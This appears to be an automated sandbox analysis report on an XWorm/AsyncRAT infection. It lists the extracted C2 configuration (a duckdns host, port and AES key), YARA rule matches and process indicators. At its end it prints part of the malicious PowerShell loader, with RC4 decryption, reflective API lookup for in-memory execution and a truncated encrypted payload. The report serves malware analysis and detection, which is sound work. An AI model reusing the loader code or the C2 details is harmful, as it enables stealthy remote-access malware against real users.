Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"} |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack |
String decryptor: nmds.duckdns.org |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack |
String decryptor: 8895 |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack |
String decryptor: <123456789> |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack |
String decryptor: <Xwormmm> |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack |
String decryptor: USB.exe |
Source: Malware configuration extractor |
URLs: nmds.duckdns.org |
Source: powershell.exe, 00000000.00000002.3073247493.0000011C86717000.00000004.00000800.00020000.00000000.sdmp, py.ps1 |
String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, XLogger.cs |
.Net Code: KeyboardLayout |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, XLogger.cs |
.Net Code: KeyboardLayout |
Source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Windows\System32\notepad.exe |
Code function: 7_2_000001D112FCAF23 |
7_2_000001D112FCAF23 |
Source: C:\Windows\System32\notepad.exe |
Code function: 7_2_000001D112FCAB03 |
7_2_000001D112FCAB03 |
Source: C:\Windows\System32\notepad.exe |
Code function: 7_2_000001D112FCB35B |
7_2_000001D112FCB35B |
Source: C:\Windows\System32\notepad.exe |
Code function: 7_2_000001D112FCB7E3 |
7_2_000001D112FCB7E3 |
Source: C:\Windows\System32\notepad.exe |
Code function: 7_2_000001D112FC9EDB |
7_2_000001D112FC9EDB |
Source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winPS1@4/10@0/0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache |
Source: C:\Windows\System32\notepad.exe |
Mutant created: NULL |
Source: C:\Windows\System32\notepad.exe |
Mutant created: \Sessions\1\BaseNamedObjects\O3B5rRVaa3oX74CD |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcgvnz3n.01j.ps1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, 
Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('S2zQef7TSeC39ba951ff8aLEINWPwe4gd9a4D0IvvbJAKTLwScmCXssrU5vuP0I6d8DDIqWLhFUVxXHWNW6xFuvYV8uJMBzIJGXdZPpyhcn+czDuyHLf0WkTCmsH7ynEolA9SwiJ+qNnNXmFg8eJBCYd7S7bAjzXGx6f3OM40JKvgSawCx6PdpB85hZmymkB2R+rWCntV |